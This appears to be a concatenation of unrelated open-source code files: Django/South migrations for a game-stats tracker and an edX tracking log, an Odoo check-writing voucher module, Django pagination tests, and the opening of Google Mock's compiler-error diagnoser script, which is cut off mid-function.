'sg_kills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'suicides': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'team': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'teamkills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'time': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vip': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'vip_captures': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vip_escapes': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vip_kills_invalid': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vip_kills_valid': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'vip_rescues': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'})
},
'tracker.procedure': {
'Meta': {'object_name': 'Procedure'},
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Game']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.SmallIntegerField', [], {}),
'score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '7'})
},
'tracker.profile': {
'Meta': {'object_name': 'Profile'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'game_first': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'on_delete': 'models.SET_NULL', 'null': 'True', 'to': "orm['tracker.Game']"}),
'game_last': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'on_delete': 'models.SET_NULL', 'null': 'True', 'to': "orm['tracker.Game']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'loadout': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Loadout']", 'on_delete': 'models.SET_NULL', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'team': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'})
},
'tracker.rank': {
'Meta': {'object_name': 'Rank', 'unique_together': "(('year', 'category', 'profile'),)"},
'category': ('django.db.models.fields.SmallIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'points': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'position': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True', 'null': 'True'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Profile']"}),
'year': ('django.db.models.fields.SmallIntegerField', [], {})
},
'tracker.server': {
'Meta': {'object_name': 'Server', 'unique_together': "(('ip', 'port'),)"},
'country': ('django.db.models.fields.CharField', [], {'blank': 'True', 'max_length': '2', 'null': 'True'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'listed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'port': ('django.db.models.fields.PositiveIntegerField', [], {}),
'port_gs1': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True', 'null': 'True'}),
'port_gs2': ('django.db.models.fields.PositiveIntegerField', [], {'blank': 'True', 'null': 'True'}),
'streamed': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'tracker.weapon': {
'Meta': {'object_name': 'Weapon'},
'distance': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'hits': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'name': ('django.db.models.fields.SmallIntegerField', [], {}),
'player': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tracker.Player']"}),
'shots': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'teamhits': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'teamkills': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'time': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'})
}
}
complete_apps = ['tracker'] | mit |
sadleader/odoo | addons/account_check_writing/account_voucher.py | 140 | 6284 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv,fields
from openerp.tools.translate import _
from openerp.tools.amount_to_text_en import amount_to_text
from lxml import etree
class account_voucher(osv.osv):
_inherit = 'account.voucher'
def _make_journal_search(self, cr, uid, ttype, context=None):
if context is None:
context = {}
journal_pool = self.pool.get('account.journal')
if context.get('write_check',False) :
return journal_pool.search(cr, uid, [('allow_check_writing', '=', True)], limit=1)
return journal_pool.search(cr, uid, [('type', '=', ttype)], limit=1)
_columns = {
'amount_in_word' : fields.char("Amount in Word", readonly=True, states={'draft':[('readonly',False)]}),
'allow_check' : fields.related('journal_id', 'allow_check_writing', type='boolean', string='Allow Check Writing'),
'number': fields.char('Number'),
}
def _amount_to_text(self, cr, uid, amount, currency_id, context=None):
# Currency complete name is not available in res.currency model
# Exceptions done here (EUR, USD, BRL) cover 75% of cases
# For other currencies, display the currency code
currency = self.pool['res.currency'].browse(cr, uid, currency_id, context=context)
if currency.name.upper() == 'EUR':
currency_name = 'Euro'
elif currency.name.upper() == 'USD':
currency_name = 'Dollars'
elif currency.name.upper() == 'BRL':
currency_name = 'reais'
else:
currency_name = currency.name
#TODO : generic amount_to_text is not ready yet, otherwise language (and country) and currency can be passed
#amount_in_word = amount_to_text(amount, context=context)
return amount_to_text(amount, currency=currency_name)
def onchange_amount(self, cr, uid, ids, amount, rate, partner_id, journal_id, currency_id, ttype, date, payment_rate_currency_id, company_id, context=None):
""" Inherited - add amount_in_word and allow_check_writting in returned value dictionary """
if not context:
context = {}
default = super(account_voucher, self).onchange_amount(cr, uid, ids, amount, rate, partner_id, journal_id, currency_id, ttype, date, payment_rate_currency_id, company_id, context=context)
if 'value' in default:
amount = 'amount' in default['value'] and default['value']['amount'] or amount
amount_in_word = self._amount_to_text(cr, uid, amount, currency_id, context=context)
default['value'].update({'amount_in_word':amount_in_word})
if journal_id:
allow_check_writing = self.pool.get('account.journal').browse(cr, uid, journal_id, context=context).allow_check_writing
default['value'].update({'allow_check':allow_check_writing})
return default
def print_check(self, cr, uid, ids, context=None):
if not ids:
raise osv.except_osv(_('Printing error'), _('No check selected '))
data = {
'id': ids and ids[0],
'ids': ids,
}
return self.pool['report'].get_action(
cr, uid, [], 'account_check_writing.report_check', data=data, context=context
)
def create(self, cr, uid, vals, context=None):
if vals.get('amount') and vals.get('journal_id') and 'amount_in_word' not in vals:
vals['amount_in_word'] = self._amount_to_text(cr, uid, vals['amount'], vals.get('currency_id') or \
self.pool['account.journal'].browse(cr, uid, vals['journal_id'], context=context).currency.id or \
self.pool['res.company'].browse(cr, uid, vals['company_id']).currency_id.id, context=context)
return super(account_voucher, self).create(cr, uid, vals, context=context)
def write(self, cr, uid, ids, vals, context=None):
if vals.get('amount') and vals.get('journal_id') and 'amount_in_word' not in vals:
vals['amount_in_word'] = self._amount_to_text(cr, uid, vals['amount'], vals.get('currency_id') or \
self.pool['account.journal'].browse(cr, uid, vals['journal_id'], context=context).currency.id or \
self.pool['res.company'].browse(cr, uid, vals['company_id']).currency_id.id, context=context)
return super(account_voucher, self).write(cr, uid, ids, vals, context=context)
def fields_view_get(self, cr, uid, view_id=None, view_type=False, context=None, toolbar=False, submenu=False):
"""
Add domain 'allow_check_writting = True' on journal_id field and remove 'widget = selection' on the same
field because the dynamic domain is not allowed on such widget
"""
if not context: context = {}
res = super(account_voucher, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)
doc = etree.XML(res['arch'])
nodes = doc.xpath("//field[@name='journal_id']")
if context.get('write_check', False) :
for node in nodes:
node.set('domain', "[('type', '=', 'bank'), ('allow_check_writing','=',True)]")
node.set('widget', '')
res['arch'] = etree.tostring(doc)
return res
| agpl-3.0 |
nesdis/djongo | tests/django_tests/tests/v21/tests/pagination/tests.py | 2 | 16095 | import unittest
from datetime import datetime
from django.core.paginator import (
EmptyPage, InvalidPage, PageNotAnInteger, Paginator,
UnorderedObjectListWarning,
)
from django.test import TestCase
from .custom import ValidAdjacentNumsPaginator
from .models import Article
class PaginationTests(unittest.TestCase):
"""
Tests for the Paginator and Page classes.
"""
def check_paginator(self, params, output):
"""
Helper method that instantiates a Paginator object from the passed
params and then checks that its attributes match the passed output.
"""
count, num_pages, page_range = output
paginator = Paginator(*params)
self.check_attribute('count', paginator, count, params)
self.check_attribute('num_pages', paginator, num_pages, params)
self.check_attribute('page_range', paginator, page_range, params, coerce=list)
def check_attribute(self, name, paginator, expected, params, coerce=None):
"""
Helper method that checks a single attribute and gives a nice error
message upon test failure.
"""
got = getattr(paginator, name)
if coerce is not None:
got = coerce(got)
self.assertEqual(
expected, got,
"For '%s', expected %s but got %s. Paginator parameters were: %s"
% (name, expected, got, params)
)
def test_paginator(self):
"""
Tests the paginator attributes using varying inputs.
"""
nine = [1, 2, 3, 4, 5, 6, 7, 8, 9]
ten = nine + [10]
eleven = ten + [11]
tests = (
# Each item is two tuples:
# First tuple is Paginator parameters - object_list, per_page,
# orphans, and allow_empty_first_page.
# Second tuple is resulting Paginator attributes - count,
# num_pages, and page_range.
# Ten items, varying orphans, no empty first page.
((ten, 4, 0, False), (10, 3, [1, 2, 3])),
((ten, 4, 1, False), (10, 3, [1, 2, 3])),
((ten, 4, 2, False), (10, 2, [1, 2])),
((ten, 4, 5, False), (10, 2, [1, 2])),
((ten, 4, 6, False), (10, 1, [1])),
# Ten items, varying orphans, allow empty first page.
((ten, 4, 0, True), (10, 3, [1, 2, 3])),
((ten, 4, 1, True), (10, 3, [1, 2, 3])),
((ten, 4, 2, True), (10, 2, [1, 2])),
((ten, 4, 5, True), (10, 2, [1, 2])),
((ten, 4, 6, True), (10, 1, [1])),
# One item, varying orphans, no empty first page.
(([1], 4, 0, False), (1, 1, [1])),
(([1], 4, 1, False), (1, 1, [1])),
(([1], 4, 2, False), (1, 1, [1])),
# One item, varying orphans, allow empty first page.
(([1], 4, 0, True), (1, 1, [1])),
(([1], 4, 1, True), (1, 1, [1])),
(([1], 4, 2, True), (1, 1, [1])),
# Zero items, varying orphans, no empty first page.
(([], 4, 0, False), (0, 0, [])),
(([], 4, 1, False), (0, 0, [])),
(([], 4, 2, False), (0, 0, [])),
# Zero items, varying orphans, allow empty first page.
(([], 4, 0, True), (0, 1, [1])),
(([], 4, 1, True), (0, 1, [1])),
(([], 4, 2, True), (0, 1, [1])),
# Number if items one less than per_page.
(([], 1, 0, True), (0, 1, [1])),
(([], 1, 0, False), (0, 0, [])),
(([1], 2, 0, True), (1, 1, [1])),
((nine, 10, 0, True), (9, 1, [1])),
# Number if items equal to per_page.
(([1], 1, 0, True), (1, 1, [1])),
(([1, 2], 2, 0, True), (2, 1, [1])),
((ten, 10, 0, True), (10, 1, [1])),
# Number if items one more than per_page.
(([1, 2], 1, 0, True), (2, 2, [1, 2])),
(([1, 2, 3], 2, 0, True), (3, 2, [1, 2])),
((eleven, 10, 0, True), (11, 2, [1, 2])),
# Number if items one more than per_page with one orphan.
(([1, 2], 1, 1, True), (2, 1, [1])),
(([1, 2, 3], 2, 1, True), (3, 1, [1])),
((eleven, 10, 1, True), (11, 1, [1])),
# Non-integer inputs
((ten, '4', 1, False), (10, 3, [1, 2, 3])),
((ten, '4', 1, False), (10, 3, [1, 2, 3])),
((ten, 4, '1', False), (10, 3, [1, 2, 3])),
((ten, 4, '1', False), (10, 3, [1, 2, 3])),
)
for params, output in tests:
self.check_paginator(params, output)
def test_invalid_page_number(self):
"""
Invalid page numbers result in the correct exception being raised.
"""
paginator = Paginator([1, 2, 3], 2)
with self.assertRaises(InvalidPage):
paginator.page(3)
with self.assertRaises(PageNotAnInteger):
paginator.validate_number(None)
with self.assertRaises(PageNotAnInteger):
paginator.validate_number('x')
with self.assertRaises(PageNotAnInteger):
paginator.validate_number(1.2)
def test_float_integer_page(self):
paginator = Paginator([1, 2, 3], 2)
self.assertEqual(paginator.validate_number(1.0), 1)
def test_no_content_allow_empty_first_page(self):
# With no content and allow_empty_first_page=True, 1 is a valid page number
paginator = Paginator([], 2)
self.assertEqual(paginator.validate_number(1), 1)
def test_paginate_misc_classes(self):
class CountContainer:
def count(self):
return 42
# Paginator can be passed other objects with a count() method.
paginator = Paginator(CountContainer(), 10)
self.assertEqual(42, paginator.count)
self.assertEqual(5, paginator.num_pages)
self.assertEqual([1, 2, 3, 4, 5], list(paginator.page_range))
# Paginator can be passed other objects that implement __len__.
class LenContainer:
def __len__(self):
return 42
paginator = Paginator(LenContainer(), 10)
self.assertEqual(42, paginator.count)
self.assertEqual(5, paginator.num_pages)
self.assertEqual([1, 2, 3, 4, 5], list(paginator.page_range))
def check_indexes(self, params, page_num, indexes):
"""
Helper method that instantiates a Paginator object from the passed
params and then checks that the start and end indexes of the passed
page_num match those given as a 2-tuple in indexes.
"""
paginator = Paginator(*params)
if page_num == 'first':
page_num = 1
elif page_num == 'last':
page_num = paginator.num_pages
page = paginator.page(page_num)
start, end = indexes
msg = ("For %s of page %s, expected %s but got %s. Paginator parameters were: %s")
self.assertEqual(start, page.start_index(), msg % ('start index', page_num, start, page.start_index(), params))
self.assertEqual(end, page.end_index(), msg % ('end index', page_num, end, page.end_index(), params))
def test_page_indexes(self):
"""
Paginator pages have the correct start and end indexes.
"""
ten = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
tests = (
# Each item is three tuples:
# First tuple is Paginator parameters - object_list, per_page,
# orphans, and allow_empty_first_page.
# Second tuple is the start and end indexes of the first page.
# Third tuple is the start and end indexes of the last page.
# Ten items, varying per_page, no orphans.
((ten, 1, 0, True), (1, 1), (10, 10)),
((ten, 2, 0, True), (1, 2), (9, 10)),
((ten, 3, 0, True), (1, 3), (10, 10)),
((ten, 5, 0, True), (1, 5), (6, 10)),
# Ten items, varying per_page, with orphans.
((ten, 1, 1, True), (1, 1), (9, 10)),
((ten, 1, 2, True), (1, 1), (8, 10)),
((ten, 3, 1, True), (1, 3), (7, 10)),
((ten, 3, 2, True), (1, 3), (7, 10)),
((ten, 3, 4, True), (1, 3), (4, 10)),
((ten, 5, 1, True), (1, 5), (6, 10)),
((ten, 5, 2, True), (1, 5), (6, 10)),
((ten, 5, 5, True), (1, 10), (1, 10)),
# One item, varying orphans, no empty first page.
(([1], 4, 0, False), (1, 1), (1, 1)),
(([1], 4, 1, False), (1, 1), (1, 1)),
(([1], 4, 2, False), (1, 1), (1, 1)),
# One item, varying orphans, allow empty first page.
(([1], 4, 0, True), (1, 1), (1, 1)),
(([1], 4, 1, True), (1, 1), (1, 1)),
(([1], 4, 2, True), (1, 1), (1, 1)),
# Zero items, varying orphans, allow empty first page.
(([], 4, 0, True), (0, 0), (0, 0)),
(([], 4, 1, True), (0, 0), (0, 0)),
(([], 4, 2, True), (0, 0), (0, 0)),
)
for params, first, last in tests:
self.check_indexes(params, 'first', first)
self.check_indexes(params, 'last', last)
# When no items and no empty first page, we should get EmptyPage error.
with self.assertRaises(EmptyPage):
self.check_indexes(([], 4, 0, False), 1, None)
with self.assertRaises(EmptyPage):
self.check_indexes(([], 4, 1, False), 1, None)
with self.assertRaises(EmptyPage):
self.check_indexes(([], 4, 2, False), 1, None)
def test_page_sequence(self):
"""
A paginator page acts like a standard sequence.
"""
eleven = 'abcdefghijk'
page2 = Paginator(eleven, per_page=5, orphans=1).page(2)
self.assertEqual(len(page2), 6)
self.assertIn('k', page2)
self.assertNotIn('a', page2)
self.assertEqual(''.join(page2), 'fghijk')
self.assertEqual(''.join(reversed(page2)), 'kjihgf')
def test_get_page_hook(self):
"""
A Paginator subclass can use the ``_get_page`` hook to
return an alternative to the standard Page class.
"""
eleven = 'abcdefghijk'
paginator = ValidAdjacentNumsPaginator(eleven, per_page=6)
page1 = paginator.page(1)
page2 = paginator.page(2)
self.assertIsNone(page1.previous_page_number())
self.assertEqual(page1.next_page_number(), 2)
self.assertEqual(page2.previous_page_number(), 1)
self.assertIsNone(page2.next_page_number())
def test_page_range_iterator(self):
"""
Paginator.page_range should be an iterator.
"""
self.assertIsInstance(Paginator([1, 2, 3], 2).page_range, type(range(0)))
def test_get_page(self):
"""
Paginator.get_page() returns a valid page even with invalid page
arguments.
"""
paginator = Paginator([1, 2, 3], 2)
page = paginator.get_page(1)
self.assertEqual(page.number, 1)
self.assertEqual(page.object_list, [1, 2])
# An empty page returns the last page.
self.assertEqual(paginator.get_page(3).number, 2)
# Non-integer page returns the first page.
self.assertEqual(paginator.get_page(None).number, 1)
def test_get_page_empty_object_list(self):
"""Paginator.get_page() with an empty object_list."""
paginator = Paginator([], 2)
# An empty page returns the last page.
self.assertEqual(paginator.get_page(1).number, 1)
self.assertEqual(paginator.get_page(2).number, 1)
# Non-integer page returns the first page.
self.assertEqual(paginator.get_page(None).number, 1)
def test_get_page_empty_object_list_and_allow_empty_first_page_false(self):
"""
Paginator.get_page() raises EmptyPage if allow_empty_first_page=False
and object_list is empty.
"""
paginator = Paginator([], 2, allow_empty_first_page=False)
with self.assertRaises(EmptyPage):
paginator.get_page(1)
class ModelPaginationTests(TestCase):
"""
Test pagination with Django model instances
"""
def setUp(self):
# Prepare a list of objects for pagination.
for x in range(1, 10):
a = Article(headline='Article %s' % x, pub_date=datetime(2005, 7, 29))
a.save()
def test_first_page(self):
paginator = Paginator(Article.objects.order_by('id'), 5)
p = paginator.page(1)
self.assertEqual("<Page 1 of 2>", str(p))
self.assertQuerysetEqual(p.object_list, [
"<Article: Article 1>",
"<Article: Article 2>",
"<Article: Article 3>",
"<Article: Article 4>",
"<Article: Article 5>"
])
self.assertTrue(p.has_next())
self.assertFalse(p.has_previous())
self.assertTrue(p.has_other_pages())
self.assertEqual(2, p.next_page_number())
with self.assertRaises(InvalidPage):
p.previous_page_number()
self.assertEqual(1, p.start_index())
self.assertEqual(5, p.end_index())
def test_last_page(self):
paginator = Paginator(Article.objects.order_by('id'), 5)
p = paginator.page(2)
self.assertEqual("<Page 2 of 2>", str(p))
self.assertQuerysetEqual(p.object_list, [
"<Article: Article 6>",
"<Article: Article 7>",
"<Article: Article 8>",
"<Article: Article 9>"
])
self.assertFalse(p.has_next())
self.assertTrue(p.has_previous())
self.assertTrue(p.has_other_pages())
with self.assertRaises(InvalidPage):
p.next_page_number()
self.assertEqual(1, p.previous_page_number())
self.assertEqual(6, p.start_index())
self.assertEqual(9, p.end_index())
def test_page_getitem(self):
"""
Tests proper behavior of a paginator page __getitem__ (queryset
evaluation, slicing, exception raised).
"""
paginator = Paginator(Article.objects.order_by('id'), 5)
p = paginator.page(1)
# Make sure object_list queryset is not evaluated by an invalid __getitem__ call.
# (this happens from the template engine when using eg: {% page_obj.has_previous %})
self.assertIsNone(p.object_list._result_cache)
with self.assertRaises(TypeError):
p['has_previous']
self.assertIsNone(p.object_list._result_cache)
self.assertNotIsInstance(p.object_list, list)
# Make sure slicing the Page object with numbers and slice objects work.
self.assertEqual(p[0], Article.objects.get(headline='Article 1'))
self.assertQuerysetEqual(p[slice(2)], [
"<Article: Article 1>",
"<Article: Article 2>",
]
)
# After __getitem__ is called, object_list is a list
self.assertIsInstance(p.object_list, list)
def test_paginating_unordered_queryset_raises_warning(self):
msg = (
"Pagination may yield inconsistent results with an unordered "
"object_list: <class 'pagination.models.Article'> QuerySet."
)
with self.assertWarnsMessage(UnorderedObjectListWarning, msg) as cm:
Paginator(Article.objects.all(), 5)
# The warning points at the Paginator caller (i.e. the stacklevel
# is appropriate).
self.assertEqual(cm.filename, __file__)
def test_paginating_unordered_object_list_raises_warning(self):
"""
Unordered object list warning with an object that has an ordered
attribute but not a model attribute.
"""
class ObjectList:
ordered = False
object_list = ObjectList()
msg = (
"Pagination may yield inconsistent results with an unordered "
"object_list: {!r}.".format(object_list)
)
with self.assertWarnsMessage(UnorderedObjectListWarning, msg):
Paginator(object_list, 5)
| agpl-3.0 |
LICEF/edx-platform | common/djangoapps/track/migrations/0001_initial.py | 189 | 2527 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'TrackingLog'
db.create_table('track_trackinglog', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('dtcreated', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('username', self.gf('django.db.models.fields.CharField')(max_length=32, blank=True)),
('ip', self.gf('django.db.models.fields.CharField')(max_length=32, blank=True)),
('event_source', self.gf('django.db.models.fields.CharField')(max_length=32)),
('event_type', self.gf('django.db.models.fields.CharField')(max_length=32, blank=True)),
('event', self.gf('django.db.models.fields.TextField')(blank=True)),
('agent', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
('page', self.gf('django.db.models.fields.CharField')(max_length=32, null=True, blank=True)),
('time', self.gf('django.db.models.fields.DateTimeField')()),
))
db.send_create_signal('track', ['TrackingLog'])
def backwards(self, orm):
# Deleting model 'TrackingLog'
db.delete_table('track_trackinglog')
models = {
'track.trackinglog': {
'Meta': {'object_name': 'TrackingLog'},
'agent': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'dtcreated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'event_source': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'event_type': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'page': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.DateTimeField', [], {}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'})
}
}
complete_apps = ['track']
| agpl-3.0 |
Abce/googlemock | scripts/gmock_doctor.py | 48 | 24117 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Converts compiler's errors in code using Google Mock to plain English."""
__author__ = '[email protected] (Zhanyong Wan)'
import re
import sys
_VERSION = '1.0.3'
_EMAIL = '[email protected]'
_COMMON_GMOCK_SYMBOLS = [
# Matchers
'_',
'A',
'AddressSatisfies',
'AllOf',
'An',
'AnyOf',
'ContainerEq',
'Contains',
'ContainsRegex',
'DoubleEq',
'ElementsAre',
'ElementsAreArray',
'EndsWith',
'Eq',
'Field',
'FloatEq',
'Ge',
'Gt',
'HasSubstr',
'IsInitializedProto',
'Le',
'Lt',
'MatcherCast',
'Matches',
'MatchesRegex',
'NanSensitiveDoubleEq',
'NanSensitiveFloatEq',
'Ne',
'Not',
'NotNull',
'Pointee',
'Property',
'Ref',
'ResultOf',
'SafeMatcherCast',
'StartsWith',
'StrCaseEq',
'StrCaseNe',
'StrEq',
'StrNe',
'Truly',
'TypedEq',
'Value',
# Actions
'Assign',
'ByRef',
'DeleteArg',
'DoAll',
'DoDefault',
'IgnoreResult',
'Invoke',
'InvokeArgument',
'InvokeWithoutArgs',
'Return',
'ReturnNew',
'ReturnNull',
'ReturnRef',
'SaveArg',
'SetArgReferee',
'SetArgPointee',
'SetArgumentPointee',
'SetArrayArgument',
'SetErrnoAndReturn',
'Throw',
'WithArg',
'WithArgs',
'WithoutArgs',
# Cardinalities
'AnyNumber',
'AtLeast',
'AtMost',
'Between',
'Exactly',
# Sequences
'InSequence',
'Sequence',
# Misc
'DefaultValue',
'Mock',
]
# Regex for matching source file path and line number in the compiler's errors.
_GCC_FILE_LINE_RE = r'(?P<file>.*):(?P<line>\d+):(\d+:)?\s+'
_CLANG_FILE_LINE_RE = r'(?P<file>.*):(?P<line>\d+):(?P<column>\d+):\s+'
_CLANG_NON_GMOCK_FILE_LINE_RE = (
r'(?P<file>.*[/\\^](?!gmock-)[^/\\]+):(?P<line>\d+):(?P<column>\d+):\s+')
def _FindAllMatches(regex, s):
"""Generates all matches of regex in string s."""
r = re.compile(regex)
return r.finditer(s)
def _GenericDiagnoser(short_name, long_name, diagnoses, msg):
"""Diagnoses the given disease by pattern matching.
Can provide different diagnoses for different patterns.
Args:
short_name: Short name of the disease.
long_name: Long name of the disease.
diagnoses: A list of pairs (regex, pattern for formatting the diagnosis
for matching regex).
msg: Compiler's error messages.
Yields:
Tuples of the form
(short name of disease, long name of disease, diagnosis).
"""
for regex, diagnosis in diagnoses:
if re.search(regex, msg):
diagnosis = '%(file)s:%(line)s:' + diagnosis
for m in _FindAllMatches(regex, msg):
yield (short_name, long_name, diagnosis % m.groupdict())
def _NeedToReturnReferenceDiagnoser(msg):
"""Diagnoses the NRR disease, given the error messages by the compiler."""
gcc_regex = (r'In member function \'testing::internal::ReturnAction<R>.*\n'
+ _GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: creating array with negative size')
clang_regex = (r'error:.*array.*negative.*\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE +
r'note: in instantiation of function template specialization '
r'\'testing::internal::ReturnAction<(?P<type>.*)>'
r'::operator Action<.*>\' requested here')
clang11_re = (r'use_ReturnRef_instead_of_Return_to_return_a_reference.*'
r'(.*\n)*?' + _CLANG_NON_GMOCK_FILE_LINE_RE)
diagnosis = """
You are using a Return() action in a function that returns a reference to
%(type)s. Please use ReturnRef() instead."""
return _GenericDiagnoser('NRR', 'Need to Return Reference',
[(clang_regex, diagnosis),
(clang11_re, diagnosis % {'type': 'a type'}),
(gcc_regex, diagnosis % {'type': 'a type'})],
msg)
def _NeedToReturnSomethingDiagnoser(msg):
"""Diagnoses the NRS disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'(instantiated from here\n.'
r'*gmock.*actions\.h.*error: void value not ignored)'
r'|(error: control reaches end of non-void function)')
clang_regex1 = (_CLANG_FILE_LINE_RE +
r'error: cannot initialize return object '
r'of type \'Result\' \(aka \'(?P<return_type>.*)\'\) '
r'with an rvalue of type \'void\'')
clang_regex2 = (_CLANG_FILE_LINE_RE +
r'error: cannot initialize return object '
r'of type \'(?P<return_type>.*)\' '
r'with an rvalue of type \'void\'')
diagnosis = """
You are using an action that returns void, but it needs to return
%(return_type)s. Please tell it *what* to return. Perhaps you can use
the pattern DoAll(some_action, Return(some_value))?"""
return _GenericDiagnoser(
'NRS',
'Need to Return Something',
[(gcc_regex, diagnosis % {'return_type': '*something*'}),
(clang_regex1, diagnosis),
(clang_regex2, diagnosis)],
msg)
def _NeedToReturnNothingDiagnoser(msg):
"""Diagnoses the NRN disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: instantiation of '
r'\'testing::internal::ReturnAction<R>::Impl<F>::value_\' '
r'as type \'void\'')
clang_regex1 = (r'error: field has incomplete type '
r'\'Result\' \(aka \'void\'\)(\r)?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::ReturnAction<(?P<return_type>.*)>'
r'::operator Action<void \(.*\)>\' requested here')
clang_regex2 = (r'error: field has incomplete type '
r'\'Result\' \(aka \'void\'\)(\r)?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
